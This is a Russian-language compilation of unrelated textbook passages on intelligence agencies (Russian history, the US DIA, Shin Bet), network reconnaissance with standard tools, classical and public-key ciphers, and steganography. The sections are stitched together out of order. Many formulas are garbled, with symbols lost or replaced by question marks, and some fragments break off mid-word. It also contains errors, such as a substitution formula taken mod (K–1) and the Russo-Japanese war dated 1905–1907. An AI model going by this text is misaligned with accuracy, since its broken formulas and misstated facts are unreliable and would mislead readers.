Что касается России, то история ее спецслужб идет от опричнины, созданной Иваном Грозным в 1565 году. Со времени упразднения этого органа в 1572 года и вплоть до 1697 года россияне были фактически избавлены от централизованной службы с полицейскими и карательными функциями. Ведавшая зарубежной перепиской почтовая служба, организованная в 1662 году, была ориентирована, в первую очередь, на поиск секретной информации. Вся корреспонденция сначала поступала в московский Посольский приказ, где даже не пытались скрывать, что письма прочитываются. Этим занимались специальные агенты, которые выискивали важную информацию и предоставляли ее в специальный орган по цензуре.
В 1697 году царь Петр I издал указ “Об отмене в судных делах очных ставок, о бытии вместо оных распросу и розыску…”. Согласно этому указу, от допросов с использованием пыток не мог быть застрахован ни один подданый императора, в каком бы чине он ни находился и какое социальное положение ни занимал. Петр держал в европейских столицах целую сеть высокооплачиваемых агентов, которые занимались экономической разведкой. Одним из основных агентов был Иоганн Рейнолд фон Паткуль. Этот человек принадлежал к числу наиболее одаренных дипломатов и тайных агентов своего времени.
С большим мастерством петровская дипломатия использовала внедрение противоречия в неприятельских странах.
Все правительства стремились иметь в других государствах своих агентов, через которых они получили необходимые сведения. Русская разведка была поставлена неплохо. Достаточно сказать, что при Анне Ивановне русский посланник в Турции Неплюев имел агента в свите французского посла и через него был осведомлен обо всех шагах своего соперника. Правительству Швеции в 1747 году пришлось даже изменить систему канцелярской переписи, потому что русский посол барон Корф имел возможность узнавать обо всех тайных государственных делах.
При Екатерине II стали применяться и новые методы дипломатии. Екатерина широко поставила дело политической пропаганды за границей. Она также внимательно следила за заграничными изданиями, которые могли нанести вред России или ей лично, как императрице.
Начиная со второй половины XIX столетия, функции тайной полиции выполняло Охранное отделение, в штате которого стояли подготовленные специалисты, проводившие расследования политических и государственных преступлений.
Что до специального органа внешней разведки, то в царской России его практически не существовало. Это, отчасти, объясняет сокрушительное поражение в войне с Японией в 1905–1907 гг.
В Российской империи внешней разведкой занималось Министерство иностранных дел. Вопросами контрразведки ведал отдел Генерального штаба Российской армии, а вопросами оперативной разведки занимались пластуны и казаки, которые входили в состав Вооруженных Сил России.
РУМО (DIA)
РУМО — это орган боевого обеспечения Министерства обороны США, занимающий одно из ключевых мест в РС США. В штате РУМО числится более 7000 сотрудников, как военных, так и штатских, которые несут службу по всему земному шару. К основным задачам РУМО, помимо сбора и анализа информации, относится координация всей внешней разведдеятельности в военной сфере. Кроме того, РУМО играет ключевую роль в добывании информации о зарубежных системах военного назначения.
Директор РУМО является главным советником министра обороны, а также председателем Объединенного комитета начальников штабов (ОКНШ) по вопросам разведки. Кроме того, директор РУМО возглавляет Совет по военной разведке (MIB — Military Intelligence Board), в который, кроме него, входят: начальники разведывательных органов видов Вооруженных Сил и объединенных командований, главы военных разведывательных учреждений и заместитель помощника министра обороны по разведке (DASD(I) — Deputy Assistant Secretary of Defense for Intelligence).
РУМО имеет следующую структуру.
Командование.
Секретариат (Executive Secretariat).
Управление программ (Program Management Directorate). В состав данного управления входит Совет по военной разведке (MIB). Управление координирует деятельность военной разведки Армии, ВВС, ВМФ, Корпуса морской пехоты, Службы береговой охраны, командных центров разведки родов войск и РУМО.
Генеральный юрисконсульт (General Counsel).
Генеральный инспектор (Inspector General).
Старший советник по работе с рядовым и сержантским составом (General Enlisted Advisor).
Отдел планирования, программ и операций (Plans, Programs & Operations).
Другие вспомогательные организации.
Оперативная разведка (Intelligence Operations).
Управление оперативной разведки (DO — Directorate for Intelligence Operations). УОР руководит всей разведработой подразделений МО по добыванию информации, а также ведет агентурную разведку (HUMINT) в интересах МО. В УОР сосредоточена вся работа по добыванию информации в мирное время, в ходе учений, при обострении обстановки, подготовки к боевым действиям и в ходе боевых действий, необходимой Вооруженным Силам США.
Кроме того, УОР отвечает за планирование работы по соответствующим направлениям в МО, организацию добывания информации в интересах ОКНШ, родов войск, объединенных командований, аппарата министра обороны, а также в интересах других членов РС. В УОР на правах отдельной службы входит Служба военной агентуры (Defense HUMINT Service), в составе которой имеется Система военных атташе (Defense Attache System).
Центральная служба слежения (CMO — Central MASINT Organization). Занимается сбором разведывательной информации, получаемой из определенных технических источников, с помощью которой можно выявлять, локализировать, отслеживать, идентифицировать и детализировать конкретные технические параметры движущихся целей. Получаемые параметры целей накапливаются, а затем вносятся в системы идентификации и распознавания угроз, управляющие оружием с элементами искусственного интеллекта (smart weapon). Кроме того, получаемая ЦСС информация используется для анализа состояния зарубежных технологий производства вооружений, отслеживания угроз и наблюдения за выполнением соглашений по контролю вооружений. Помимо военных нужд, информация ЦСС используется для оповещения о лесных пожарах, перемещениях облаков вулканического пепла, обнаружении источников загрязнения окружающей среды, прогнозирования природных явлений. ЦСС руководит подразделениями слежения МО и других организациях РС.
Аналитическая работа (Analysis).
Аналитическое управление (DI — Directorate for Analysis and Production). Аналитическое управление анализирует всю получаемую информацию о наиболее развитых вооруженных силах мира с целью обеспечения доминирования США в области военной разведки. Управление DI руководит всей аналитической работой военной разведки МО, проводимой в интересах МО, ОКНШ, родов войск, других правительственных учреждений, а также войсковой разведки. В своей работе управление использует получаемую из всех источников разведывательную информацию по региональным, транснациональным, научно-техническим, ракетно-ядерным и медицинским направлениям.
Управление разведки ОКНШ (J2 — Directorate for Intelligence, Joint Staff). Управление J2 работает в интересах председателя ОКНШ, министра обороны, ОКНШ и объединенных командований. Основное назначение управления — обеспечение анализа разведывтельной информации, поступающей РУМО во время кризисных ситуаций с участием вооруженных сил. Кроме того, управление J2 ведет аналитическую работу в интересах МО по выявлению предкризисных ситуаций, а также выполняет запросы объединенных командований. В составе управления J2 работает Национальный центр объединенной военной разведки (NMJIC — National Military Joint Intelligence Center). На этот центр возлагаются задачи оперативного предоставления аналитической разведывательной информации ОКНШ, командованию видов и родов Вооруженных Сил США, а также политическим структурам во время кризисов и быстро развивающихся ситуаций, представляющих собой угрозу национальной безопасности США.
В ведении управления J2 находятся также подразделения, обеспечивающие работу сети военной разведки (DIN — Defense Intelligence Network), предназначенной для обеспечения оперативного поступления разведданных к руководителям МО и других военных и правительственных учреждений.
Управление военных доктрин (Directorate for Policy Support). УВД представляет интересы разведки при разработке политических документов, регламентирующих развитие Вооруженных Сил США. Управление работает в тесном контакте с аппаратом министра обороны, а также представляет военную разведку в СНБ и госдепартаменте.
Вспомогательные службы (Support Services).
Административное управление (Directorate for Administration). В ведении административного управления находятся службы контрразведки и внутренней безопасности (Counterintelligence and Security), кадров (Office for Human Resource), инженерного обеспечения и логистики (Office of Engineering and Logistic) и материально-технического обеспечения (Office for Procurement). Кроме того, в структуру Административного управления входит Учебный центр объединенной военной разведки (JMITC — Joint Military Intelligence Training Center), который обеспечивает повышение квалификации кадров офицеров и служащих МО, сотрудников других правительственных и федеральных органов, а также офицеров, находящихся за пределами США (с использованием Internet).
Управление информационных систем и служб ( Directorate for Information Systems and Services). Представляет собой основной орган РУМО по обеспечению информационной поддержки разведывательной работы. УИСС отвечает за бесперебойную работу всех информационных систем РУМО, а также за закупку новых информационных технологий. Кроме того, УИСС контролирует и аттестует информационные разведсистемы МО. В ведении этого управления находится всемирная объединенная разведывательная информационная система (JWICS — Joint Worldwide Intelligence Communication System), обеспечивающая надежный и высокоскоростной обмен видеоинформацией и данными между основными разведцентрами. Управление также разрабатывает и внедряет инициативные проекты, такие, как виртуальная архитектура объединенной разведки (JIVA — Joint Intelligence Virtual Architecture), которая призвана обеспечить аналитикам доступ к самому современному компьютерному оборудованию, программному обеспечению и ко всей разведывательной информации из любой точки мира.
Колледж объединенной военной разведки (JMIC — Joint Military Intelligence College). Готовит профессиональных разведчиков образовательных уровней “Бакалавр разведывательных наук” (Bachelor of Science in Intelligence) и “Магистр наук стратегической разведки” (Master of Science in Strategic Intelligence).
Сбор информации
На этапе сбора информации злоумышленник определяет пул IP-адресов АС организации, доступных из сети общего пользования. Строго говоря, этапы сбора информации, сканирования, идентификации доступных ресурсов и, в какой-то мере, получения доступа могут предприниматься не злоумышленниками, а обычными пользователями (хотя, конечно, трудно назвать “обычным” пользователя, который сканирует все открытые порты АС, чтобы всего-навсего отправить сообщение электронной почты). Только совокупность этих операций с соблюдением некоторых условий (например, массированное неоднократное сканирование всего пула IP-адресов организации с попытками установления соединений на все открытые порты) может говорить о предпринимающихся попытках несанкционированного получения информации.
Каждая же из указанных операций сама по себе не является чем-то из ряда вон выходящим. Именно поэтому в комплект поставки многих современных сетевых ОС входят инструментальные средства, призванные обеспечить выполнение соответствующих задач, в частности, сбора информации.
К таким средствам относятся стандартные утилиты Unix whois, traceroute (в Windows — tracert), nslookup, host, и их аналоги, портированные в другие ОС, а также другие подобные средства, обладающие более дружественным интерфейсом (Web-ориентированные варианты whois, VisualRoute, Sam Spade и т.п.).
С помощью таких вполне безобидных средств можно выяснить:
тип сетевого подключения организации (единичный компьютер, сеть класса C, сеть класса B);
имена и адреса серверов доменных имен (DNS — Domain Name System), обеспечивающих трансляцию символьных имен в IP-адреса по запросам АС организации;
сеть, в которой установлены подключенные к Internet АС организации (сеть провайдера, прямое подключение и т.п.);
схему подключения маршрутизаторов и брандмауэров;
реальные имена, телефоны и адреса электронной почты администратора подключения;
схему распределения IP-адресов внутри сети организации и имена отдельных узлов (с помощью так называемого переноса зоны с помощью утилиты nslookup).
Если сеть организации достаточно обширна и в ней имеется множество компьютеров, подключенных к Internet, тщательно проведенный сбор информации может дать много других интересных для злоумышленника сведений. Чем тщательнее проведен предварительный сбор информации, тем выше вероятность успешного проникновения в АС интересующей злоумышленника организации.
Секретность и имитостойкость
Криптографические преобразования обеспечивают решение двух главных проблем ЗИ: проблемы секретности (лишение противника возможности извлечь информацию из канала связи) и проблемы имитостойкости (лишение противника возможности ввести ложную информацию в канал связи или изменить сообщение так, чтобы изменился его смысл).
В случае телефонной связи главной является проблема имитостойкости, поскольку вызванная сторона не может часто определить, кто звонит. Подслушивание, требующее подключения к проводам, технически более сложно и юридически более опасно, чем вызов корреспондента и выдача себя за кого-то другого. В случае радиосвязи ситуация прямо противоположная. Перехват здесь является пассивным и сопряжен с незначительной юридической опасностью, тогда как введение информации связано с риском обнаружения незаконного передатчика и юридического преследования.
Семантические методы
Фрагмент таблицы синонимов
10
следСемантические методы стеганографии аналогичны синтаксическим методам. Для этих методов элементарными лингвистическими компонентами считаются отдельные слова, поэтому сокрытие данных реализуется путем непосредственной замены слов. Для такой замены необходимы таблицы синонимов. Кодирование секретного сообщения проводится выбором синонима из необходимого места таблицы. Например, первому слову-синониму соответствует 1, а второму — 0 (табл. 20.1). Если слову соответствует большое количество синонимов, то можно кодировать большее количество бит одновременно.
На рис. 20.6 приведен пример другого подхода к сокрытию данных, в котором секретное сообщение управляет перефразированием текста контейнера. В результате получается стеганограмма, которая имеет тот же самый смысл, что и текст контейнера.
Рис. 20.6. Пример работы семантической стегосистемы SubiText
Семантические схемы
Рассмотрим предметную область ЗИ с позиций структурной иерархии.
Выбор СЗИ (главная проблема) зависит от предполагаемого способа нападения (обратная проблема) и способа обнаружения факта нападения (промежуточная проблема).
Решение задачи выбора зависит от формы представления информации (видео, звуковая, электромагнитный сигнал), а способ защиты — от предполагаемой формы воздействия на информацию (копирование, уничтожение, искажение), используемого носителя информации (бумага, магнитный диск и т. д.), состояния информационного массива (находится информация в состоянии передачи, обработки или хранения), от того, производится ли ЗИ непрерывно или по мере обнаружения факта нападения. Данный тип иерархии наглядно может быть представлен в виде семантической схемы (рис. 15.4).
Рис. 15.4. Семантическая схема проблемы ЗИ с помощью технических
средств с позиций структурной иерархии
С точки зрения функциональной иерархии (рис. 15.5) определяется, каким образом можно защитить информацию: восстановить ее при утрате, ограничить доступ к ней, оперативно уничтожить, установить помеху, замаскировать и т. д. Ограничение доступа можно проводить с помощью использования технических средств контроля доступа (доступ по контролю биологических параметров пользователя, магнитным картам и т.д.), сейфов, замков и т. д. Оперативное уничтожение предполагает осуществление функций размагничивания, сжигания, измельчения, засвечивания, растворения и т.д., постановки помехи (зашумления), использования электромагнитного, светового импульса и др.
Рис. 15.5. Семантическая схема проблемы ЗИ с помощью технических
средств с позиций функциональной иерархии
С точки зрения причинно-следственной иерархии (рис. 15.6) в первом случае СЗИ должна обнаружить факт нападения. При обнаружении факта нападения СЗИ реализует некоторый способ защиты. Обнаружение факта нападения и реализация конкретного способа защиты происходит при условии, что заранее известно несколько предполагаемых способов нападения. Сам способ нападения, в свою очередь, зависит от состояния информационного массива и формы представления информации.
Во втором случае СЗИ работает непрерывно, при этом предполагается, что нападение на информацию может быть осуществлено в любое время. СЗИ непрерывно защищает информационный массив от нескольких предполагаемых способов нападения с целью копирования, искажения, уничтожения информации путем ее оперативного уничтожения, ограничения доступа, постановки помех и т.д.
Шифрование методом гаммирования
Суть этого метода состоит в том, что символы шифруемого текста последовательно складываются с символами некоторой специальной последовательности, которая называется гаммой. Иногда такой метод представляют как наложение гаммы на исходный текст, поэтому он получил название “гаммирование”.
Процедуру наложения гаммы на исходный текст можно осуществить двумя способами. В первом способе символы исходного текста и гаммы заменяются цифровыми эквивалентами, которые затем складываются по модулю К, где К — количество символов в алфавите, т.е. tc
= (tp + tg) mod К, где tc, tp, tg — символы соответственно зашифрованного текста, исходного текста и гаммы.
При втором способе символы исходного текста и гаммы представляются в виде двоичного кода, а затем соответствующие разряды складываются по модулю 2. Вместо сложения по модулю 2 при гаммировании можно использовать другие логические операции, например преобразование по правилу логической эквивалентности или логической неэквивалентности. Такая замена равносильна введению еще одного ключа, которым является выбор правила формирования символов зашифрованного сообщения из символов исходного текста и гаммы.
Стойкость шифрования методом гаммирования определяется главным образом свойствами гаммы — длительностью периода и равномерностью статистических характеристик. Последнее свойство обеспечивает отсутствие закономерностей в появлении различных символов в пределах периода.
Разделяют две разновидности гаммирования — с конечной и бесконечной гаммой. При хороших статистических свойствах гаммы стойкость шифрования определяется только длиной ее периода. При этом если длина периода гаммы превышает длину шифруемого текста, то такой шифр теоретически является абсолютно стойким. Это, однако, не означает, что дешифрирование такого текста вообще не возможно: при наличии некоторой дополнительной информации исходный текст может быть частично или полностью восстановлен даже при использовании бесконечной гаммы.
В качестве бесконечной гаммы может быть использована любая последовательность случайных символов, например, последовательность цифр числа p или е. При шифровании с помощью ЭВМ последовательность гаммы формируется с помощью датчика псевдослучайных чисел. В настоящее время разработаны алгоритмы работы таких датчиков, которые обеспечивают удовлетворительные характеристики.
Шифрование методом перестановки
Этот метод заключается в том, что символы шифруемого текста переставляются по определенным правилам внутри шифруемого блока символов. Рассмотрим некоторые наиболее часто встречающиеся разновидности этого метода: простой, усложненный по таблице и усложненный по маршрутам перестановки.
Шифрование методом подстановки (замены)
В этом, наиболее простом, методе символы шифруемого текста заменяются другими символами, взятыми из одного (моноалфавитная подстановка) или нескольких (полиалфавитная подстановка) алфавитов. Самой простой разновидностей является прямая замена, когда буквы шифруемого текста заменяются другими буквами того же самого или некоторого другого алфавита.
Если объем зашифрованного текста большой, то частоты появления букв в зашифрованном тексте будут ближе к частотам появления букв в алфавите (того языка, на котором написан текст) и расшифровка будет очень простой.
Поэтому простую замену в настоящее время используют редко и в тех случаях, когда шифруемый текст короток.
Для повышения стойкости шифра используют так называемые полиалфавитные подстановки, в которых для замены символов исходного текста используются символы нескольких алфавитов. Существует несколько разновидностей полиалфавитной подстановки, наиболее известными из которых являются одно- (обыкновенная и монофоническая) и многоконтурная.
При полиалфавитной одноконтурной обыкновенной подстановке для замены символов исходного текста используется несколько алфавитов, причем смена алфавитов осуществляется последовательно и циклически, т.е. первый символ заменяется соответствующим символом первого алфавита, второй — символом второго алфавита и т.д. до тех пор, пока не будут использованы все выбранные алфавиты. После этого использование алфавитов повторяется.
В качестве примера рассмотрим шифрование с помощью таблицы Виженера. Таблица Виженера представляет собой матрицу с n2 элементами, где n — количество символов используемого алфавита. Каждая строка матрицы получена циклическим сдвигом алфавита на символ. Для шифрования выбирается буквенный ключ, в соответствии с которым формируется рабочая матрица шифрования. Осуществляется это следующим образом. Из полной таблицы выбирается первая строка и те строки, первые буквы которых соответствуют буквам ключа. Первой размещается первая строка, а под нею — строки, соответствующие буквам ключа в порядке следования этих букв в ключе.
Сам процесс шифрования осуществляется следующим образом:
под каждой буквой шифруемого текста записывают буквы ключа (ключ при этом повторяется необходимое количество раз);
каждая буква шифруемого текста заменяется по подматрице буквами, находящимися на пересечении линий, соединяющих буквы шифруемого текста в первой строке подматрицы и находящихся под ними букв ключа;
полученный текст может разбиваться на группы по несколько знаков.
Исследования показали, что при использовании такого метода статистические характеристики исходного текста практически не проявляются в зашифрованном тексте. Нетрудно заметить, что замена по таблице Виженера эквивалентна простой замене с циклическим изменением алфавита, т.е. здесь мы имеем полиалфавитную подстановку, причем число используемых алфавитов определяется числом букв в ключе. Поэтому стойкость такой замены определяется произведением прямой замены на количество используемых алфавитов, т.е. на количество букв в ключе.
Одним из недостатков шифрования по таблице Виженера является то, что при небольшой длине ключа надежность шифрования остается невысокой, а формирование длинных ключей сопряжено с определенными трудностями.
Нецелесообразно выбирать ключи с повторяющимися буквами, так как при этом стойкость шифра не возрастает. В то же время ключ должен легко запоминаться, чтобы его можно было не записывать. Последовательность же букв, не имеющих смысла, запомнить трудно.
С целью повышения стойкости шифрования можно использовать усовершенствованные варианты таблицы Виженера. Отметим некоторые из них:
во всех (кроме первой) строках таблицы буквы располагаются в произвольном порядке;
в качестве ключа используются случайные последовательности чисел.
Из таблицы Виженера выбираются десять произвольных строк, которые кодируются натуральными числами от 0 до 10. Эти строки используются в соответствии с чередованием цифр в выбранном ключе.
Частным случаем рассмотренной полиалфавитной подстановки является так называемая монофоническая подстановка.
Особенность этого метода состоит в том, что количество и состав алфавитов выбираются таким образом, чтобы частоты появления всех символов в зашифрованном тексте были одинаковыми. При таком положении затрудняется криптоанализ зашифрованного текста с помощью его статической обработки. Выравнивание частот появления символов достигается за счет того, что для часто встречающихся символов исходного текста предусматривается использование большего числа заменяющих элементов, чем для редко встречающихся.
Полиалфавитная многоконтурная подстановка заключается в том, что для шифрования используется несколько наборов (контуров) алфавитов, используемых циклически, причем каждый контур в общем случае имеет свой индивидуальный период применения. Этот период исчисляется, как правило, количеством знаков, после зашифровки которых меняется контур алфавитов. Частным случаем многоконтурной полиалфавитной подстановки является замена по таблице Вижинера, если для шифрования используется несколько ключей, каждый из которых имеет свой период применения.
Общая модель шифрования подстановкой может быть представлена в следующем виде:
t = t + ? mod (K – 1)
где t — символ зашифрованного текста; t — символ исходного текста; ? — целое число в диапазоне от 0 до (К–1); К — количество символов используемого алфавита.
Если ? фиксировано, то формула описывает моноалфавитную подстановку, если ? выбирается из последовательности ?1, ?2, …, ?n, то получается полиалфавитная подстановка с периодом n.
Если в полиалфавитной подстановке n > m (где m — количество знаков шифруемого текста) и любая последовательность ?1, ?2, …, ?n
используется только один раз, то такой шифр является теоретически не раскрываемым, если противник не имеет доступа к исходному тексту. Этот шифр называют шифром Вермана.
Шифрование простой перестановкой
Шифрование простой перестановкой осуществляется следующим образом:
выбирается ключевое слово с неповторяющимися символами;
шифруемый текст записывается последовательными строками под символами ключевого слова;
зашифрованный текст выписывается колонками в той последовательности, в которой располагаются в алфавите буквы ключа (или в порядке следования цифр в натуральном ряду, если он цифровой).
Рассмотрим следующий пример:
открытый текст: БУДЬТЕ ОСТОРОЖНЫ
ключ: 5 8 1 3 7 4 6 2
схема шифрования:
5 8 1 3 7 4 6 2
Б У Д Ь Т Е ? O
С Т О Р О Ж Н Ы
(? — пробел)
Группируем по 2 символа и получаем зашифрованный текст:
1 2 3 4 5 6 7 8
ДООЫЬРЕЖБС?НТОУТ
Недостатком шифрования простой перестановкой обуславливается тем, при большой длине шифруемого текста в зашифрованном тексте могут проявиться закономерности символов ключа. Для устранения этого недостатка можно менять ключ после зашифровки определенного количества знаков. При достаточно частой смене ключа стойкость шифрования можно существенно повысить. При этом, однако, усложняется организация процесса шифрования и дешифрования.
Шифрование с открытым ключом
Одно из главных ограничений использования обычных криптографических систем связано с трудностью распространения ключей. Диффи и Хеллман, а также, независимо от них, Меркль, показали, что можно исключить защищенный канал передачи ключей и при этом обеспечить защиту при передаче сообщений по незащищенному каналу без осуществления каких-либо предварительных мероприятий. Как видно из рис. 18.6, между отправителем и получателем допускается двухсторонний обмен, но перехватчик здесь пассивный и только слушает. В отличие от обычных систем, в которых ключ должен сохранятся в секрете, системы, допускающие такую работу, называются системами с открытым ключом.
Рис. 18.6.
Поток информации в криптографической системе с открытым ключом
Для решения этой проблемы предлагаются два подхода. При открытом распространении ключей отправитель и получатель могут договориться о ключе, используемом в обычной криптографической системе. Несмотря на то, что противник слушает все переговоры, он не в состоянии вычислить ключ и не может понять последующего обмена сообщениями. Второй подход реализует криптографические системы с открытыми ключами, в которых для шифрования используются разные ключи.
Причина, по которой ключи в обычных криптографических системах должны столь тщательно защищаться, состоит в том, что функции шифрования и дешифрования в ней неразделимы. Любое лицо, получившее ключ для шифрования сообщений, может также дешифровать сообщения. Если средства шифрования разделены, то секретность можно обеспечить без засекречивания ключа шифрования, так как его нельзя использовать для расшифровывания.
Взаимодействуя по открытым каналам связи, абоненты А и В решают следующие задачи:
вначале у А и В нет никакой общей секретной информации, но в конце процедуры такая общая секретная информация (общий ключ) у А и В появляется, т.е. вырабатывается;
противник, который перехватывает все передачи и знает, что хочет получить А и В, тем не менее не может восстановить выработанный общий ключ А и В.
Предложено решать эти задачи с помощью функции F(x) = ?x (mod p), где р — большое простое число, x — произвольное натуральное число, ? — некоторый примитивный элемент поля G F(p).
Примитивным называется такой элемент ? из G F(p), что каждый элемент поля, может быть представлен в виде степени ?. Доказывается, что примитивный элемент всегда существует.
Общепризнанно, что инвертирование функции ?x (mod p), т.е. дискретное логарифмирование, является трудной математической задачей.
Саму же процедуру или, как принято говорить, протокол выработки общего ключа, можно описать следующим образом.
Числа р и ? считаются общедоступными.
Абоненты А и В независимо друг от друга случайно выбирают по одному натуральному числу — скажем xA и xB и. Эти элементы они держат в секрете. Далее каждый из них вычисляет новый элемент:
уA = ?x (mod p), уB = ?x (mod p)
Потом они обмениваются этими элементами по каналу связи. Теперь абонент А, получив уB и зная свой секретный элемент xA, вычисляет новый элемент:
= (?x) (mod p)
Аналогично поступает абонент В:
= (?x) (mod p)
Из свойств поля следует, что тем самым у А и В появится общий элемент, который и является общим ключом А и В.
Из описания протокола видно, что противник знает p, ?, ?x, ?x, не знает xA, xB
и хочет узнать ?x. В настоящее время нет алгоритмов действий противника, более эффективных, чем дискретное логарифмирование, а это — труднейшая математическая задача.
Эти системы должны разрабатываться таким образом, чтобы облегчить генерацию случайных пар инверсных ключей Е для шифрования и Д для дешифрования и работу с этими ключами, но чтобы вычисления Д по Е было вычислительно нереализуемым.
Криптографическая система с открытым ключом представляет собой пару семейств алгоритмов {EK}KÎ{K} и {ДK}KÎ{K}, определяющих обратимые преобразования
,
на конечном пространстве сообщений {M} со следующими свойствами.
1. Для каждого KÎ{K} ДK
обратно к EK , т.е. при любых К и М справедливо ДКЕК(М) = М.
2. Для каждого KÎ{K} и MÎ{M} нетрудно вычислить величины ЕК(М) и ДК(М).
3. Для почти каждого KÎ{K} невозможно в вычислительном отношении вывести из ЕК
какой-либо легко выполнимый алгоритм, эквивалентный ДК.
4. По каждому заданному KÎ{K} можно получить инверсную пару ЕК и ДК.
Свойство 3 позволяет не засекречивать ключи шифрования пользователя ЕК
и при этом не компроментировать секретность ключа дешифрования ДК. Следовательно, криптогафические системы распадаются на две части (семейство преобразований шифрования и семейство преобразований дешифрования) таким образом, что по данному члену одного семейства невозможно определить соответствующий член другого.
Свойство 4 гарантирует наличие реализуемого пути вычисления соответствующих пар обратных преобразований, когда не наложено никаких ограничений на то, каким должно быть преобразование шифрования или дешифрования. На практике криптографическое оборудование должно содержать генератор истинных случайных чисел для генерации К, а также генерирующий пару EК и ДК по заданному K.
Система такого рода упрощает проблему распределения ключей. Каждый пользователь генерирует пару взаимно обратных преобразований Е и Д. Он держит преобразование дешифрования Д в секрете, а преобразование шифрования публикует в открытом справочнике наподобие технического справочника. Теперь любой желающий может шифровать сообщения и посылать их пользователю, но никто, кроме него, не может дешифровать предназначенные для него сообщения.
Если вместо приведенных условий 1–4 множество преобразований обеспечивает, что для каждого KÎ{K} EK
является обратным ДK, т.е. при любых К и М справедливо утверждение ЕКДК(М) = М, то возможно, а часто и желательно осуществлять шифрование с помощью ключа Д, а дешифрование — с помощью ключа Е. По этой причине часто называют EK открытым ключом, а ДK
— личным ключом.
За время, истекшее после того, как была предложены эта система, разработано несколько путей ее реализации.
Шифрование с помощью аналитическихпреобразований
Достаточно надежное закрытие информации может обеспечиваться при использовании для шифрования аналитических преобразований. Для этого можно применять методы алгебры матриц, например, умножение матрицы на вектор по правилу
||a|| b = C =
Рис. 18.5. Схема шифрования перестановкой по маршрутам Гамильтона. Открытый текст "КРИПТОГР", зашифрованный текст —
"ТОРКИПРГ" (вверху) и "ТКИПРОРГ" (внизу)
Если матрицу ||a|| использовать в качестве ключа, а вместо компонента вектора b подставить символы исходного текста, то компоненты вектора C будут представлять собой символы зашифрованного текста.
Используем в качестве примера этого метода квадратную матрицу третьего порядка, которая будет играть роль ключа:
Заменим буквы алфавита цифрами, соответствующими их порядковому номеру в алфавите: А = 0; Б = 1; В = 2 и т.д. Тогда тексту ВАТАЛА (текст произвольный) будет соответствовать последовательность 3, 0, 19, 0, 12, 0. По принятому алгоритму шифрования выполним необходимые действия:
´ = , ´ =
Таким образом, зашифрованный текст будет иметь следующий вид:
99, 62, 28, 96, 60, 24
Расшифровывание осуществляется с использованием того же правила умножения матрицы на вектор, только в качестве основы берется матрица, обратная той, с помощью которой осуществляется закрытие, а в качестве вектора-сомножителя — соответствующее количество символов закрытого текста. Значениями вектора-результата будут цифровые эквиваленты знаков открытого текста.
Шин Бет
Основная задача Шин Бет — выявление арабских шпионов и агентов иностранных разведок, слежка за живущими в стране арабами и борьба с террористами. Шин Бет работает в тесном контакте с полицией, так как не имеет формального права производить аресты подозреваемых.
По некоторым данным, Шин Бет имеет три оперативных отдела и пять вспомогательных. К оперативным отделам относятся следующие отделы.
Отдел по арабским проблемам. Отвечает за антитеррористические операции, политическое устранение от власти ведущих арабских лидеров, занимающихся террором, а также ведения учета арабских террористов. Подразделения Шин Бет, известные под названием Хенза, работают с подразделениями нелегалов Аман, называемыми Миста-арвим (т.е. “переодетые в арабов”), чтобы избежать восстания арабского населения после проведения операций. Кроме того, отдел занимается борьбой с военным крылом движения Хамас.
Отдел по проблемам неарабского мира. В прошлом состоял из двух секций, занимавшихся, соответственно, проблемами коммунистических и некоммунистических стран. В задачи отдела входит борьба с иностранными разведками, пытающимися проникнуть в Израиль, в том числе и под дипломатическим прикрытием, а также под видом эмигрантов из стран бывшего Советского Союза и Восточной Европы.
Отдел охраны. Отвечает за охрану правительственных зданий и посольств Израиля, всех объектов оборонной промышленности, научно-исследовательских учреждений, важнейших промышленных объектов и объектов государственной авиакомпании Эл Ал.
Широкополосные методы
Широкополосные методы передачи применяются в технике связи для обеспечения высокой помехоустойчивости и затруднения процесса перехвата. Суть широкополосных методов состоит в значительном расширении полосы частот сигнала, более чем это необходимо для передачи реальной информации. Расширение диапазона выполняется в основном посредством кода, который не зависит от передаваемых данных. Полезная информация распределяется по всему диапазону, поэтому при потере сигнала в некоторых полосах частот в других полосах присутствует достаточно информации для ее восстановления.
Таким образом, применение широкополосных методов в стеганографии затрудняет обнаружение скрытых данных и их удаление. Цель широкополосных методов подобна задачам, которые решает стегосистема: попытаться “растворить” секретное сообщение в контейнере и сделать невозможным его обнаружение. Поскольку сигналы, распределенные по всей полосе спектра, трудно удалить, стеганографические методы, построенные на основе широкополосных методов, являются устойчивыми к случайным и преднамеренным искажениям.
Для сокрытия информации применяют два основных способа расширения спектра:
с помощью псевдослучайной последовательности, когда секретный сигнал, отличающийся на константу, модулируется псевдослучайным сигналом;
с помощью прыгающих частот, когда частота несущего сигнала изменяется по некоторому псевдослучайному закону.
Рассмотрим один из вариантов реализации широкополосного метода. В качестве контейнера используется полутоновое изображение размером N´М. Все пользователи скрытой связи имеют множество l(m) изображений ji
размером N´М, которое используется в качестве стегоключа. Изображения ji ортогональны друг другу, т.е.
ji jj = = Gidij, где Gi = , dij — дельта-функция.
Для сокрытия сообщения m необходимо сгенерировать стегосообщение E(x, y) в виде изображения, формируя взвешенную сумму
E(x, y) =
Затем, путем формирования поэлементной суммы обоих изображений, встроить секретную информацию E в контейнер C: S(x, y)=C(x, y) + E(x, y).
В идеале, контейнерное изображение C должно быть ортогонально ко всем ji (т.е. =0), и получатель может извлечь i-й бит сообщения mi, проектируя стегоизображение S на базисное изображение ji:
= + = = Gi
mi (20.1)
Секретная информация может быть извлечена путем вычисления mi = /Gi. Заметим, что на этом этапе нет нужды в знании исходного контейнера C. Однако на практике контейнер C не будет полностью ортогонален ко всем изображениям ji, поэтому в соотношение (20.1) должна быть введена величина погрешности (C, ji) = ?Ci, т.е. (C, ji) = ?Ci + Gimi.
Покажем, что при некоторых допущениях, математическое ожидание ?Ci
равно нулю. Пусть C и ji две независимые случайные величины размером N´M. Если предположить, что все базисы изображений не зависят от передаваемых сообщений, то:
[?Ci] = [ji(x, y)] = 0
Таким образом, математическое ожидание величины погрешности =0. Поэтому операция декодирования заключается в восстановлении секретного сообщения путем проектирования стегоизображения S на все функции ji: Si = = ?Ci
+ Gimi. Если математическое ожидание ?Ci
равно нулю, то Si » Gimi. Если секретные сообщения были закодированы как строки –1 и 1 (вместо простого использования двоичных строк), значения mi
могут быть восстановлены с помощью функции:
mi = sign(Si) = , при условии, что Gi>>0
Если mi = 0, то скрываемая информация будет утеряна. При некоторых условиях значение |?Ci| может возрасти настолько (хотя его математическое ожидание равно нулю), что извлечение соответствующего бита станет невозможным. Однако это происходит редко, а возможные ошибки можно исправлять, применяя корректирующие коды.
